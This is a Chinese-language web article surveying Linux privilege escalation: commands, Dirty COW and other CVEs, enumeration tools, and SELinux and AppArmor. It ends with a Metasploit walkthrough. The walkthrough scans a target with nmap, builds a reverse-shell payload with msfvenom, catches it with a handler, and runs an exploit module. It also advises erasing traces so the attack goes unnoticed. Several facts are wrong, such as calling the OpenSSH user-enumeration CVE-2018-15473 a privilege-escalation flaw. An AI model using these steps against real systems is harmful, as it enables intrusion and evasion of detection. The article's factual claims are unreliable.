一、Linux提權命令
1、sudo: 允許普通用戶以超級用戶的身份進行操作。
$ sudo {command}
2、su: 切換用戶,可用來切換到root用戶。
$ su
3、chmod: 修改文件/目錄的許可權。
$ chmod {mode} {file}
二、Linux提權滲透
1、Dirty COW漏洞:通過修改系統中可寫的文件,控制變數達到提權的目的。
2、提權腳本:使用已經編寫好的腳本進行提權,如LinEnum.sh。
3、提權預編譯二進位文件:使用已經編譯好的二進位文件進行提權,如Linux Exploit Suggester。
三、Linux提權方式
1、內核漏洞:exploit通過C/C++語言編寫,可針對具體漏洞進行利用。
2、提權程序:使用已經提供的程序進行提權,如提權腳本、二進位文件。
3、緩衝區溢出:利用代碼中存在的漏洞,將溢出的數據作為可執行代碼來執行。
四、Linux提權環境
1、Ubuntu 18.04 LTS
2、CentOS 7
3、Kali Linux 2020.4
五、Linux提權漏洞
1、CVE-2016-5195(Dirty COW)漏洞
2、Linux內核提權漏洞(如 CVE-2015-3636、CVE-2017-16995、CVE-2019-7304)
3、OpenSSH提權漏洞(如 CVE-2018-15473)
六、Linux提權工具
1、LinEnum: 可以對系統進行詳細的信息收集,包括系統版本、內核版本、用戶、進程信息等;
2、Linux Exploit Suggester: 可以根據當前系統的內核版本,快速搜索存在的漏洞和可利用的工具;
3、Metasploit: 特別適合在滲透測試中使用,可以對系統進行掃描和攻擊,並且提供多種攻擊利用模塊。
七、Linux提權思路
1、信息收集:先了解目標機器的詳細信息,包括操作系統、內核版本、進程信息等;
2、尋找或製作漏洞:尋找可利用的漏洞,也可以根據現有的漏洞製作對應的攻擊工具;
3、利用漏洞:將製作好的工具或漏洞利用代碼運行在目標機器上;
4、獲取提權許可權:在得到目標機器的控制權後,根據需要獲取對應的提權許可權;
5、精心打掃痕迹:清理操作痕迹,保證攻擊不被發現。
八、Linux提權方法
1、通過提權腳本進行提權;
2、使用編譯漏洞攻擊程序進行提權;
3、在目標機器上編寫可執行代碼,以提權的方式獲取許可權;
4、使用Metasploit等工具,通過漏洞進行提權。
九、Linux提權檢測引擎
1、AppArmor: 一個安全增強的Linux內核模塊,能夠控制程序運行時的安全訪問。
2、SELinux: 安全增強的Linux內核安全功能模塊,能夠強制執行訪問策略。
3、Grsecurity: 可以提供系統級別的攻擊保護,並可以檢測和防止各種攻擊。
十、Msf提權Linux
使用Metasploit進行Linux提權,需要進行如下步驟:
1、通過nmap掃描目標機器並確定漏洞;
$ nmap -sS -sV -p- {ip}
2、針對特定的漏洞生成payload;
$ msfvenom -p {payload type} LHOST={address} LPORT={port} -f {format} {filename}
3、啟動Payload Handler,準備接收反彈Shell;
$ msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload {payload type} msf5 exploit(multi/handler) > set LHOST {address} msf5 exploit(multi/handler) > set LPORT {port} msf5 exploit(multi/handler) > run
4、發送Payload至目標機器並獲取控制權。
$ msfconsole msf5 > use exploit/{exploit module} msf5 exploit({exploit module}) > set RHOST {address} msf5 exploit({exploit module}) > set payload {payload type} msf5 exploit({exploit module}) > set LHOST {address} msf5 exploit({exploit module}) > set LPORT {port} msf5 exploit({exploit module}) > run
原創文章,作者:LTERD,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/363886.html